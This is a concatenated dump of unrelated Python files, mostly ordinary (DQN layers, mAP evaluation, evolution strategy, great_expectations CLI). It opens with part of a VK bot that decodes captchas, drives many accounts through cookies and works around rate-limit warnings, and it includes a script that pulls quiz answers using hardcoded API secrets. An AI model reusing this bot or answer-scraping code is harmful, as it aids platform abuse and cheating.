self.browser.get_forms()[0]\n\t\tform[\"captcha_key\"] = vk_captcha.decode(page=self.browser.parsed, root_path=self.root_path)\n\t\tself.browser.submit_form(form)\n\nclass sup_func:\n\t\"\"\"Вспомогательные функции\"\"\"\n\n\tdef img_paths_list(path=\"data/content/images\"):\n\t\t\"\"\"Получет путь к каталогу с папками с картинками, возвращает их относ. пути\"\"\"\n\t\timg_rel_paths = []\n\t\tfor directory in os.listdir(path):\n\t\t\timg_dir_path = path + \"/\"\n\t\t\timg_dir_path += directory\n\t\t\tfor f in os.listdir(img_dir_path):\n\t\t\t\timg_path = img_dir_path + \"/\" + f\n\t\t\t\timg_rel_paths.append(os.path.abspath(img_path))\n\n\t\treturn img_rel_paths\n\n\tdef random_img_binary(img_rel_paths=img_paths_list()):\n\t\trandom_img = random.choice(img_rel_paths)\n\t\tbinary_img = open(random_img, \"rb\")\n\t\treturn binary_img\n\n\tdef random_img(img_rel_paths=img_paths_list()):\n\t\trandom_img = random.choice(img_rel_paths)\n\t\treturn random_img\n\n\tdef open_page_with_retries(page, upload_url):\n\t\tfor i in range(5) :\n\t\t\tpage.open(upload_url)\n\t\t\tif \"service_msg_warning\" in page.parsed:\n\t\t\t\twait_time = 5 * (i + 1)\n\t\t\t\tprint(\"service_msg_warning: Одинаковые обращения | ожидаем %s\" % wait_time)\n\t\t\t\ttime.sleep(wait_time)\n\t\t\t\tcontinue\n\t\t\treturn page\n\n\tdef avatar_retry_decorator(post_func):\n\t\tdef wrapper(arg1, arg2):\n\t\t\tRETRY_TIMES = 5\n\t\t\tWAIT_STEP = 5\n\t\t\tfor i in range(RETRY_TIMES):\n\t\t\t\ttry:\t\t\n\t\t\t\t\tpost_func(arg1, arg2)\n\t\t\t\t\tbreak\n\t\t\t\texcept IndexError:\n\t\t\t\t\twait_time = (i + 1) * WAIT_STEP\n\t\t\t\t\ttime.sleep(wait_time)\n\t\t\t\t\tprint(\"Не удалось загрузить аватар | попытка %s/%s | ожидаем %s\" % (i + 1, RETRY_TIMES, wait_time))\n\t\treturn wrapper\n\n\n\t\n\nclass AllUsersControll:\n\t\"\"\"Методы для управления всеми аккаунтами\"\"\"\n\tdef start_driver(proxy=\"\"):\n\t\tfor i in range(5):\n\t\t\ttry:\n\t\t\t\tif proxy:\n\t\t\t\t\traise #посмотреть serv ad, port num\n\t\t\t\t\tproxy = proxy.split(\":\")\n\t\t\t\t\tserver_adress = proxy[0] \n\t\t\t\t\tport_number = int(proxy[1])\n\t\t\t\t\tprofile = selenium.webdriver.FirefoxProfile()\n\t\t\t\t\tprofile.set_preference(\"network.proxy.type\", 1)\n\t\t\t\t\tprofile.set_preference(\"network.proxy.http\", server_adress)\n\t\t\t\t\tprofile.set_preference(\"network.proxy.http_port\", port_number)\n\t\t\t\t\tprofile.set_preference('network.proxy.ssl_port', port_number)\n\t\t\t\t\tprofile.set_preference('network.proxy.ssl', server_adress)\n\t\t\t\t\tprofile.update_preferences()\n\t\t\t\t\tdriver = selenium.webdriver.Firefox(firefox_profile=profile)\n\t\t\t\telse:\n\t\t\t\t\tdriver = selenium.webdriver.Firefox()\n\t\t\t\tbreak\n\t\t\texcept selenium.common.exceptions.WebDriverException:\n\t\t\t\ttime.sleep(3)\n\t\t\t\tprint(\"Не удалось открыть selenium firefox в api.py/AllUsersControll.start_driver()\")\n\t\t\t\tcontinue\n\n\t\treturn driver\n\n\tdef set_cookies_to_driver(driver, cookies):\n\t\tdriver.delete_all_cookies()\n\t\tdriver.get(\"https://m.vk.com/\")\n\t\tfor cookie in cookies:\n\t\t\tdriver.add_cookie({'name':cookie, 'value':cookies[cookie]})\n\t\t#driver.get(\"https://m.vk.com/\")\n\t\treturn driver\n\n\t@sup_func.avatar_retry_decorator\n\tdef _change_avatar_with_driver(group, driver):\n\t\t\"\"\"driver должен быть signed in\"\"\"\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdriver.get(\"https://m.vk.com/\" + group.group_id)\n\t\t\t\tinput_elem = driver.find_element_by_class_name(\"inline_upload\")\n\t\t\t\timg = sup_func.random_img()\n\t\t\t\tinput_elem.send_keys(img)\n\t\t\t\ttime.sleep(1)\n\t\t\t\tbreak\n\t\t\texcept selenium.common.exceptions.NoSuchElementException:\n\t\t\t\tprint('слишком много однотипных действий sleep 7s')\n\t\t\t\ttime.sleep(7)\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tsave_button = driver.find_element_by_id(\"zpv_save_button\")\n\t\t\t\tsave_button.click()\n\t\t\t\ttime.sleep(3)\n\t\t\t\tcontinue\n\t\t\texcept:\n\t\t\t\tbreak\n\t\ttime.sleep(1)\n\t\treturn 1\n\n\tdef upload_avatar_to_new(group, driver):\n\t\tAllUsersControll._change_avatar_with_driver(group, driver)\n\n\n\tdef upload_avatars_to_all(users, driver=\"\"):\n\t\tif not driver:\n\t\t\tdriver = AllUsersControll.start_driver()\n\t\tfor user in users:\n\t\t\tdriver = AllUsersControll.set_cookies_to_driver(driver, user.get_cookies())\n\t\t\tfor group in user.groups:\n\t\t\t\tAllUsersControll._change_avatar_with_driver(group, driver)\n\n\tdef make_message(targ):\n\t\tmessage = \"%s\\n@id%s(%s %s ©)\" % (targ[\"status\"], targ[\"id\"], targ[\"first_name\"], targ[\"last_name\"])\n\t\treturn message\n\n\n\n\n\n\n# \tdef get_all_users(path=\"data/accounts.json\"):\n# \t\twith open(path,\"r\") as f:\n# \t\t\taccounts = f.read()\n# \t\t\tif not accounts:\n# \t\t\t\treturn 0 # Файл accounts.json пуст\n# \t\t\taccounts = json.loads(accounts)\n# \t\tall_users = []\n# \t\tfor account in accounts:\n# \t\t\tall_users.append(User(account, accounts[account]))\n# \t\treturn all_users\n\n# \tdef get_all_exists_groups(users=get_all_users()):\n# \t\tall_groups = []\n# \t\tfor user in users:\n# \t\t\tsession = user.session\n# \t\t\tset_session_to_driver(driver, session)\n# \t\t\tfor group in user.groups:\n# \t\t\t\tall_groups.append(group)\n# \t\treturn all_groups\n\n\n# \tdef upload_avatars_to_new_groups(users=get_all_users()):\n# \t\t\"\"\"Использует Selenium для выполнения js скриптов\"\"\"\n# \t\tdriver = start_driver() # Предварительно инициализируем driver, для каждого пользователя меняем только сессию\n# \t\tfor group in get_all_exists_groups():\n\n\n\n#
Вы попытались загрузить более одной однотипной страницы в секунду. Вернитесь назад и повторите попытку.
\n\n\n\n\n\nif __name__ == \"__main__\":\n\tprint(sup_func.random_img_to_binary())\n\n\n\n\n\n\n\t\n\n\n\n\n\n\n\n\n\t\t\n\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"416558850","text":"import tensorflow as tf\nimport rl_env as rl\n\nclass DQNAnn(rl.Agents.AbstractANN):\n def __init__(self, nb_entry, nb_hiddens, nb_out, scope=\"\"):\n self.nb_entry = nb_entry\n self.nb_hiddens = nb_hiddens\n self.nb_out = nb_out\n super(DQNAnn, self).__init__(scope)\n\n def _create_ann(self):\n self.input = tf.placeholder(tf.float32, [None, self.nb_entry])\n last = self.input\n for it in self.nb_hiddens:\n last = tf.layers.dense(last, it, tf.nn.relu)\n self.output = tf.layers.dense(last, self.nb_out)\n","sub_path":"Learning/DQNAnn.py","file_name":"DQNAnn.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"52846448","text":"from functools import reduce\nfrom typing import List\n\nclass Solution:\n\n # def reducer(self, s1, s2):\n # L = 0\n # for x in range(min(len(s1), len(s2))):\n # if s1[x] != s2[x]:\n # break\n # L += 1\n # return s1[:L]\n\n # def longestCommonPrefix(self, strs: List[str]) -> str:\n # if not strs:\n # return \"\"\n # return reduce(self.reducer, strs)\n\n def longestCommonPrefix(self, strs:List[str]) -> str:\n prefix = \"\"\n if not strs:\n return prefix\n\n min_length = min([len(s) for s in strs])\n\n for i in range(min_length):\n if len(set(s[i] for s in strs)) == 1:\n prefix += strs[0][i]\n else:\n break\n return prefix\n\n\nif __name__ == \"__main__\":\n print(Solution().longestCommonPrefix([\"flower\",\"flow\",\"flight\"]))\n print(Solution().longestCommonPrefix([\"aa\", \"ab\"]))\n","sub_path":"LeetCode/top-interview-questions-easy/strings/longest-common-prefix.py","file_name":"longest-common-prefix.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"532973800","text":"import tools.importer\n\nSHEET_ID_DEV = \"1GDYUsjtJMub8Gh_hZMu4UQw6hAVmtUh6E0rS9dlUl3o\"\nSHEET_ID_PROD = \"1N1qLMoWyi3WFGhIpPFzKsFmVE0IwNP3elb_c18t2DwY\"\n\nSHEET_ID = SHEET_ID_PROD\n\nRANGE_STATS = \"Statistika!A3:BT\"\n\nif __name__ == \"__main__\":\n tools.importer.sheet2csv(\n id=SHEET_ID, range=RANGE_STATS, filename=\"data/full.csv\",\n )\n\n","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"418281590","text":"import numpy as np\nimport json\nimport os\nimport matplotlib.pyplot as plt\nimport torch\n\nlabels = ['Background', 'Knife', 'Horse', 'Human body']\n\n\ndef compute_overlap(a, b):\n \"\"\"\n Parameters\n ----------\n a: (N, 4) ndarray of float\n b: (K, 4) ndarray of float\n Returns\n -------\n overlaps: (N, K) ndarray of overlap between boxes and query_boxes\n \"\"\"\n area = (b[:, 2] - b[:, 0]) * (b[:, 3] - b[:, 1])\n\n iw = np.minimum(np.expand_dims(a[:, 2], axis=1), b[:, 2]) - np.maximum(np.expand_dims(a[:, 0], 1), b[:, 0])\n ih = np.minimum(np.expand_dims(a[:, 3], axis=1), b[:, 3]) - np.maximum(np.expand_dims(a[:, 1], 1), b[:, 1])\n\n iw = np.maximum(iw, 0)\n ih = np.maximum(ih, 0)\n\n ua = np.expand_dims((a[:, 2] - a[:, 0]) * (a[:, 3] - a[:, 1]), axis=1) + area - iw * ih\n\n ua = np.maximum(ua, np.finfo(float).eps)\n\n intersection = iw * ih\n\n return intersection / ua\n\n\ndef _compute_ap(recall, precision):\n \"\"\" Compute the average precision, given the recall and precision curves.\n Code originally from https://github.com/rbgirshick/py-faster-rcnn.\n \"\"\"\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], recall, [1.]))\n mpre = np.concatenate(([0.], precision, [0.]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\n\ndef evaluate_model(all_detections, all_annotations, iou_threshold=0.5):\n average_precisions = {}\n p_r = {}\n\n for label in range(4):\n false_positives = np.zeros((0,))\n true_positives = np.zeros((0,))\n scores = np.zeros((0,))\n num_annotations = 0.0\n\n for i in range(len(all_annotations)):\n detections = []\n annotations = []\n\n for _, xmin, ymin, xmax, ymax, conf, class_id in all_detections[i]:\n if int(class_id) == label:\n detections.append([xmin, ymin, xmax, ymax])\n scores = np.append(scores, float(conf))\n\n if int(all_annotations[i][5]) == label:\n annotations = [[all_annotations[i][1], all_annotations[i][2], all_annotations[i][3], all_annotations[i][4]]]\n\n detections = np.array(detections, dtype='int')\n annotations = np.array(annotations, dtype='int')\n\n num_annotations += len(annotations)\n detected_annotations = []\n\n for d in detections:\n if len(annotations) == 0:\n false_positives = np.append(false_positives, 1)\n true_positives = np.append(true_positives, 0)\n continue\n\n overlaps = compute_overlap(np.expand_dims(d, axis=0), annotations)\n assigned_annotation = np.argmax(overlaps, axis=1)\n max_overlap = overlaps[0, assigned_annotation]\n\n if max_overlap >= iou_threshold and assigned_annotation not in detected_annotations:\n false_positives = np.append(false_positives, 0)\n true_positives = np.append(true_positives, 1)\n detected_annotations.append(assigned_annotation)\n else:\n false_positives = np.append(false_positives, 1)\n true_positives = np.append(true_positives, 0)\n\n if num_annotations == 0:\n average_precisions[label] = 0, 0\n p_r[label] = [], []\n continue\n\n # sort by score\n # indices = np.argsort(-scores)\n indices = np.argsort(-scores)\n false_positives = false_positives[indices]\n true_positives = true_positives[indices]\n\n # compute false positives and true positives\n false_positives = np.cumsum(false_positives)\n true_positives = np.cumsum(true_positives)\n\n # compute recall and precision\n recall = true_positives / num_annotations\n precision = true_positives / np.maximum(true_positives + false_positives, np.finfo(np.float64).eps)\n\n # compute average precision\n average_precision = _compute_ap(recall, precision)\n average_precisions[label] = average_precision, num_annotations\n p_r[label] = precision, recall\n\n map = 0.0\n for i in range(1, 4):\n map += average_precisions[i][0]\n map /= 3\n\n print('\\nmAP: ', map)\n for label in range(1, 4):\n label_name = labels[label]\n if not label_name.isnumeric():\n print(label_name)\n print(\"AP: \" + str(average_precisions[label][0]))\n precision, recall = p_r[label]\n print(\"Precision: \", precision[-1] if len(precision) > 0 else 0)\n print(\"Recall: \", recall[-1] if len(recall) > 0 else 0)\n\n return average_precisions\n","sub_path":"model/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"283573329","text":"# evolution strategy (mu + lambda) of the ackley objective function\nfrom numpy import asarray, exp, sqrt, cos, e, pi, argsort\nfrom numpy.random import randn, rand, seed\n\n# objective function\ndef objective(v):\n\tx, y = v\n\treturn -20.0 * exp(-0.2 * sqrt(0.5 * (x**2 + y**2))) - exp(0.5 * (cos(2 * pi * x) + cos(2 * pi * y))) + e + 20\n\n# check if a point is within the bounds of the search\ndef in_bounds(point, bounds):\n\t# enumerate all dimensions of the point\n\tfor d in range(len(bounds)):\n\t\t# check if out of bounds for this dimension\n\t\tif point[d] < bounds[d, 0] or point[d] > bounds[d, 1]:\n\t\t\treturn False\n\treturn True\n\n# evolution strategy (mu + lambda) algorithm\ndef es_plus(objective, bounds, n_iter, step_size, mu, lam):\n\tbest, best_eval = None, 1e+10\n\t# calculate the number of children per parent\n\tn_children = int(lam / mu)\n\t# initial population\n\tpopulation = list()\n\tfor _ in range(lam): # for each citizen of current population\n\t\tcandidate = None\n\t\twhile candidate is None or not in_bounds(candidate, bounds):\n\t\t\t### bounds[:, 0] - select first colum\n\t\t\tcandidate = bounds[:, 0] + rand(len(bounds)) * (bounds[:, 1] - bounds[:, 0])\n\t\tpopulation.append(candidate)\n\t\n\t# perform the search\n\tfor epoch in range(n_iter):\n\t\t# evaluate fitness for the population\n\t\tscores = [objective(c) for c in population]\n\n\t\t# numpy.argsort - Returns the indices that would sort an array.\n\t\tmedium = argsort(scores)\t# ustawia w liscie od najmniejszego do najwiekszego\n\t\t\n\t\t# rank scores in ascending order\n\t\tranks = argsort(argsort(scores))\n\t\t# select the indexes for the top mu ranked solutions\n\t\tselected = [count for count,_ in enumerate(ranks) if ranks[count] < mu]\n\t\t# create children from parents\n\t\tchildren = list()\n\t\tfor i in selected:\n\t\t\t# check if this parent is the best solution ever seen\n\t\t\tif scores[i] < best_eval:\n\t\t\t\tbest, best_eval = population[i], scores[i]\n\t\t\t\tprint('Epoka %d, Najlepszy osobnik dotychczas: f(%s) = %.5f' % (epoch, best, best_eval))\n\t\t\t\n\t\t\t# keep the parent\n\t\t\tchildren.append(population[i])\n\t\t\t# create children for parent\n\t\t\tfor _ in range(n_children):\n\t\t\t\tchild = None\n\t\t\t\twhile child is None or not in_bounds(child, bounds):\n\t\t\t\t\tchild = population[i] + randn(len(bounds)) * step_size\n\t\t\t\tchildren.append(child)\n\t\t# replace population with children\n\t\tpopulation = children\n\treturn [best, best_eval]\n\n# seed the pseudorandom number generator\nseed(1)\n# define range for input\nbounds = asarray([[-5.0, 5.0], [-5.0, 5.0]])\n# define the total iterations\nn_iter = 5000\n# define the maximum step size\nstep_size = 0.15\n# number of parents selected\nmu = 5\n# the number of children generated by parents\nlam = 10\n# perform the evolution strategy (mu + lambda) search\nbest, score = es_plus(objective, bounds, n_iter, step_size, mu, lam)\nprint('Done!')\nprint('f(%s) = %f' % (best, score))","sub_path":"esPlus_template.py","file_name":"esPlus_template.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"539648278","text":"import requests\nimport json\n\n\ndef get_all_gra_choice_answer(list, taskID=1):\n url = \"http://192.168.1.154:55262/sysGrammar/{}/mulChoice\".format(list)\n querystring = {\"taskID\": \"{}\".format(taskID)}\n headers = {\n 'platform': \"Android\",\n 'appversion': \"1.0\",\n 'appkey': \"Cet_E94A599B77DA\",\n 'app': \"cee\",\n 'appsecret': \"8548C4F6-96F1-4E37-ADD6-89BEF5478B9B\",\n 'accesstoken': \"b9e93792-d6f9-4e5d-bd80-f00bead144e1\",\n 'host': \"192.168.1.154:55262\",\n 'connection': \"Keep-Alive\",\n 'accept-encoding': \"gzip\",\n 'user-agent': \"okhttp/3.7.0\",\n 'cache-control': \"no-cache\",\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n answer = response.text\n json_data = json.loads(answer)\n result = json_data.pop(\"data\").pop('questGuide')\n word_answers = []\n for a in result:\n word_answers.append(a.pop('questAnswer'))\n print(\"Database_answers:\", word_answers)\n return word_answers\n\n\ndef right_answer_gra_choice(answer, num):\n get_answer = answer[:]\n right_answer = get_answer.pop(int(num)-1)\n return right_answer\n\n\ndef wrong_answer_gra_choice(answer, num):\n get_answer = answer[:]\n test = get_answer.pop(int(num)-1)\n wrong_answer = []\n if (ord(test) + 1) <= 68:\n wrong_answer.append(chr(ord(test) + 1))\n else:\n wrong_answer.append(chr(ord(test) -1))\n return \"\".join(wrong_answer)\n\n#\n# answer = get_all_gra_choice_answer(list=1533, taskID=1)\n# print(right_answer_gra_choice(answer, 6))\n# print(wrong_answer_gra_choice(answer, 6))\n","sub_path":"testcase/interface/reading/sen_analysis/get_all_sen_analysis_answer.py","file_name":"get_all_sen_analysis_answer.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"290876697","text":"# -*- coding: utf-8 -*-\nimport click\nimport json\nimport logging\nimport os\nimport shutil\nimport sys\nimport warnings\n\nfrom great_expectations.cli.init_messages import (\n BUILD_DOCS_PROMPT,\n COMPLETE_ONBOARDING_PROMPT,\n GREETING,\n LETS_BEGIN_PROMPT,\n NEW_TEMPLATE_INSTALLED,\n NEW_TEMPLATE_PROMPT,\n NO_DATASOURCES_FOUND,\n ONBOARDING_COMPLETE,\n PROJECT_IS_COMPLETE,\n RUN_INIT_AGAIN,\n SLACK_LATER,\n SLACK_SETUP_INTRO,\n SLACK_SETUP_COMPLETE,\n SLACK_SETUP_PROMPT,\n SLACK_WEBHOOK_PROMPT,\n)\nfrom .datasource import (\n add_datasource as add_datasource_impl,\n profile_datasource,\n build_docs as build_documentation_impl,\n MSG_GO_TO_NOTEBOOK,\n)\nfrom great_expectations.cli.util import cli_message, is_sane_slack_webhook\nfrom great_expectations.data_context import DataContext\nfrom great_expectations.data_asset import FileDataAsset\nfrom great_expectations.dataset import Dataset, PandasDataset\nimport great_expectations.exceptions as ge_exceptions\nfrom great_expectations import __version__ as ge_version\nfrom great_expectations import read_csv\n#FIXME: This prevents us from seeing a huge stack of these messages in python 2. We'll need to fix that later.\n# tests/test_cli.py::test_cli_profile_with_datasource_arg\n# /Users/abe/Documents/superconductive/tools/great_expectations/tests/test_cli.py:294: Warning: Click detected the use of the unicode_literals __future__ import. This is heavily discouraged because it can introduce subtle bugs in your code. You should instead use explicit u\"\" literals for your unicode strings. For more information see https://click.palletsprojects.com/python3/\n# cli, [\"profile\", \"my_datasource\", \"-d\", project_root_dir])\nclick.disable_unicode_literals_warning = True\n\n\nwarnings.filterwarnings('ignore')\n\ntry:\n from termcolor import colored\nexcept ImportError:\n colored = None\n\n\n# Take over the entire GE module logging namespace when running CLI\nlogger = logging.getLogger(\"great_expectations\")\n\n# class NaturalOrderGroup(click.Group):\n# def __init__(self, name=None, commands=None, **attrs):\n# if commands is None:\n# commands = OrderedDict()\n# elif not isinstance(commands, OrderedDict):\n# commands = OrderedDict(commands)\n# click.Group.__init__(self, name=name,\n# commands=commands,\n# **attrs)\n#\n# def list_commands(self, ctx):\n# return self.commands.keys()\n\n# TODO: consider using a specified-order supporting class for help (but wasn't working with python 2)\n# @click.group(cls=NaturalOrderGroup)\n@click.group()\n@click.version_option(version=ge_version)\n@click.option('--verbose', '-v', is_flag=True, default=False,\n help='Set great_expectations to use verbose output.')\ndef cli(verbose):\n \"\"\"great_expectations command-line interface\"\"\"\n if verbose:\n logger.setLevel(logging.DEBUG)\n\n\n@cli.command()\n@click.argument('dataset')\n@click.argument('expectation_suite_file')\n@click.option('--evaluation_parameters', '-p', default=None,\n help='Path to a file containing JSON object used to evaluate parameters in expectations config.')\n@click.option('--result_format', '-o', default=\"SUMMARY\",\n help='Result format to use when building evaluation responses.')\n@click.option('--catch_exceptions', '-e', default=True, type=bool,\n help='Specify whether to catch exceptions raised during evaluation of expectations (defaults to True).')\n@click.option('--only_return_failures', '-f', default=False, type=bool,\n help='Specify whether to only return expectations that are not met during evaluation '\n '(defaults to False).')\n@click.option('--custom_dataset_module', '-m', default=None,\n help='Path to a python module containing a custom dataset class.')\n@click.option('--custom_dataset_class', '-c', default=None,\n help='Name of the custom dataset class to use during evaluation.')\ndef validate(\n dataset,\n expectation_suite_file,\n evaluation_parameters,\n result_format,\n catch_exceptions, only_return_failures, custom_dataset_module, custom_dataset_class):\n \"\"\"Validate a CSV file against an expectation suite.\n\n DATASET: Path to a file containing a CSV file to validate using the provided expectation_suite_file.\n\n EXPECTATION_SUITE_FILE: Path to a file containing a valid great_expectations expectations suite to use to \\\nvalidate the data.\n \"\"\"\n\n \"\"\"\n Read a dataset file and validate it using an expectation suite saved in another file. Uses parameters defined in \n the dispatch method.\n\n :param parsed_args: A Namespace object containing parsed arguments from the dispatch method.\n :return: The number of unsuccessful expectations\n \"\"\"\n expectation_suite_file = expectation_suite_file\n\n expectation_suite = json.load(open(expectation_suite_file))\n\n if evaluation_parameters is not None:\n evaluation_parameters = json.load(\n open(evaluation_parameters, \"r\"))\n\n # Use a custom data_asset module and class if provided. Otherwise infer from the expectation suite\n if custom_dataset_module:\n sys.path.insert(0, os.path.dirname(\n custom_dataset_module))\n module_name = os.path.basename(\n custom_dataset_module).split('.')[0]\n custom_module = __import__(str(module_name))\n dataset_class = getattr(\n custom_module, custom_dataset_class)\n elif \"data_asset_type\" in expectation_suite:\n if (expectation_suite[\"data_asset_type\"] == \"Dataset\" or\n expectation_suite[\"data_asset_type\"] == \"PandasDataset\"):\n dataset_class = PandasDataset\n elif expectation_suite[\"data_asset_type\"].endswith(\"Dataset\"):\n logger.info(\"Using PandasDataset to validate dataset of type %s.\" %\n expectation_suite[\"data_asset_type\"])\n dataset_class = PandasDataset\n elif expectation_suite[\"data_asset_type\"] == \"FileDataAsset\":\n dataset_class = FileDataAsset\n else:\n logger.critical(\"Unrecognized data_asset_type %s. You may need to specify custom_dataset_module and \\\n custom_dataset_class.\" % expectation_suite[\"data_asset_type\"])\n return -1\n else:\n dataset_class = PandasDataset\n\n if issubclass(dataset_class, Dataset):\n da = read_csv(dataset, expectation_suite=expectation_suite,\n dataset_class=dataset_class)\n else:\n da = dataset_class(dataset, config=expectation_suite)\n\n result = da.validate(\n evaluation_parameters=evaluation_parameters,\n result_format=result_format,\n catch_exceptions=catch_exceptions,\n only_return_failures=only_return_failures,\n )\n\n # Note: Should this be rendered through cli_message?\n # Probably not, on the off chance that the JSON object contains tags\n print(json.dumps(result, indent=2))\n sys.exit(result['statistics']['unsuccessful_expectations'])\n\n\n@cli.command()\n@click.option(\n '--target_directory',\n '-d',\n default=\"./\",\n help='The root of the project directory where you want to initialize Great Expectations.'\n)\n@click.option(\n # Note this --no-view option is mostly here for tests\n \"--view/--no-view\",\n help=\"By default open in browser unless you specify the --no-view flag\",\n default=True\n)\ndef init(target_directory, view):\n \"\"\"\n Create a new project and help with onboarding.\n\n This guided input walks the user through setting up a new project and also\n onboards a new developer in an existing project.\n\n It scaffolds directories, sets up notebooks, creates a project file, and\n appends to a `.gitignore` file.\n \"\"\"\n target_directory = os.path.abspath(target_directory)\n ge_dir = _get_full_path_to_ge_dir(target_directory)\n ge_yml = os.path.join(ge_dir, DataContext.GE_YML)\n\n cli_message(GREETING)\n\n # TODO this should be a property\n if os.path.isfile(ge_yml):\n if DataContext.all_uncommitted_directories_exist(ge_dir) and \\\n DataContext.config_variables_yml_exist(ge_dir):\n # Ensure the context can be instantiated\n try:\n _ = DataContext(ge_dir)\n cli_message(PROJECT_IS_COMPLETE)\n except ge_exceptions.DataContextError as e:\n cli_message(\"{}\".format(e))\n exit(5)\n else:\n _complete_onboarding(target_directory)\n\n try:\n # if expectations exist, offer to build docs\n context = DataContext(ge_dir)\n if context.list_expectation_suite_keys():\n if click.confirm(BUILD_DOCS_PROMPT, default=True):\n context.build_data_docs()\n context.open_data_docs()\n except ge_exceptions.DataContextError as e:\n cli_message(\"{}\".format(e))\n else:\n if not click.confirm(LETS_BEGIN_PROMPT, default=True):\n cli_message(RUN_INIT_AGAIN)\n exit(0)\n\n context, data_source_name, data_source_type = _create_new_project(target_directory)\n if not data_source_name: # no datasource was created\n return\n\n profile_datasource(context, data_source_name, open_docs=view, additional_batch_kwargs={\"limit\": 1000})\n cli_message(\"\"\"\\nGreat Expectations is now set up in your project!\"\"\")\n\n\ndef _slack_setup(context):\n webhook_url = None\n cli_message(SLACK_SETUP_INTRO)\n if not click.confirm(SLACK_SETUP_PROMPT, default=True):\n cli_message(SLACK_LATER)\n return context\n else:\n webhook_url = click.prompt(SLACK_WEBHOOK_PROMPT, default=\"\")\n\n while not is_sane_slack_webhook(webhook_url):\n cli_message(\"That URL was not valid.\\n\")\n if not click.confirm(SLACK_SETUP_PROMPT, default=True):\n cli_message(SLACK_LATER)\n return context\n webhook_url = click.prompt(SLACK_WEBHOOK_PROMPT, default=\"\")\n\n context.save_config_variable(\"validation_notification_slack_webhook\", webhook_url)\n cli_message(SLACK_SETUP_COMPLETE)\n\n return context\n\n\ndef _get_full_path_to_ge_dir(target_directory):\n return os.path.abspath(os.path.join(target_directory, DataContext.GE_DIR))\n\n\ndef _create_new_project(target_directory):\n try:\n context = DataContext.create(target_directory)\n data_source_name, data_source_type = add_datasource_impl(context)\n return context, data_source_name, data_source_type\n except ge_exceptions.DataContextError as err:\n logger.critical(err.message)\n sys.exit(-1)\n\n\ndef _complete_onboarding(target_dir):\n if click.confirm(COMPLETE_ONBOARDING_PROMPT, default=True):\n DataContext.create(target_dir)\n cli_message(ONBOARDING_COMPLETE)\n else:\n cli_message(RUN_INIT_AGAIN)\n\n\n\n@cli.command()\n@click.option(\n '--directory',\n '-d',\n default=None,\n help=\"The project's great_expectations directory.\"\n)\n@click.option(\n \"--view/--no-view\",\n help=\"By default open in browser unless you specify the --no-view flag\",\n default=True\n)\ndef add_datasource(directory, view):\n \"\"\"Add a new datasource to the data context.\"\"\"\n try:\n context = DataContext(directory)\n except ge_exceptions.ConfigNotFoundError as err:\n cli_message(\"{}\".format(err.message))\n return\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, context.root_directory)\n\n data_source_name, data_source_type = add_datasource_impl(context)\n\n if not data_source_name: # no datasource was created\n return\n\n profile_datasource(context, data_source_name, open_docs=view)\n\n\n@cli.command()\n@click.option(\n '--directory',\n '-d',\n default=None,\n help=\"The project's great_expectations directory.\"\n)\ndef list_datasources(directory):\n \"\"\"List known datasources.\"\"\"\n try:\n context = DataContext(directory)\n datasources = context.list_datasources()\n # TODO Pretty up this console output\n cli_message(str([d for d in datasources]))\n except ge_exceptions.ConfigNotFoundError as err:\n cli_message(\"{}\".format(err.message))\n return\n except ge_exceptions.ZeroDotSevenConfigVersionError as err:\n _offer_to_install_new_template(err, context.root_directory)\n\n\n@cli.command()\n@click.argument('datasource_name', default=None, required=False)\n@click.option('--data_assets', '-l', default=None,\n help='Comma-separated list of the names of data assets that should be profiled. Requires datasource_name specified.')\n@click.option('--profile_all_data_assets', '-A', is_flag=True, default=False,\n help='Profile ALL data assets within the target data source. '\n 'If True, this will override --max_data_assets.')\n@click.option(\n \"--directory\",\n \"-d\",\n default=None,\n help=\"The project's great_expectations directory.\"\n)\n@click.option('--batch_kwargs', default=None,\n help='Additional keyword arguments to be provided to get_batch when loading the data asset. Must be a valid JSON dictionary')\n@click.option(\n \"--view/--no-view\",\n help=\"By default open in browser unless you specify the --no-view flag\",\n default=True\n)\ndef profile(datasource_name, data_assets, profile_all_data_assets, directory, view, batch_kwargs):\n \"\"\"\n Profile datasources from the specified context.\n\n If the optional data_assets and profile_all_data_assets arguments are not specified, the profiler will check\n if the number of data assets in the datasource exceeds the internally defined limit. If it does, it will\n prompt the user to either specify the list of data assets to profile or to profile all.\n If the limit is not exceeded, the profiler will profile all data assets in the datasource.\n\n :param datasource_name: name of the datasource to profile\n :param data_assets: if this comma-separated list of data asset names is provided, only the specified data assets will be profiled\n :param profile_all_data_assets: if provided, all data assets will be profiled\n :param directory:\n :param view: Open the docs in a browser\n :param batch_kwargs: Additional keyword arguments to be provided to get_batch when loading the data asset.\n :return:\n \"\"\"\n\n try:\n context = DataContext(directory)\n except ge_exceptions.ConfigNotFoundError as err:\n 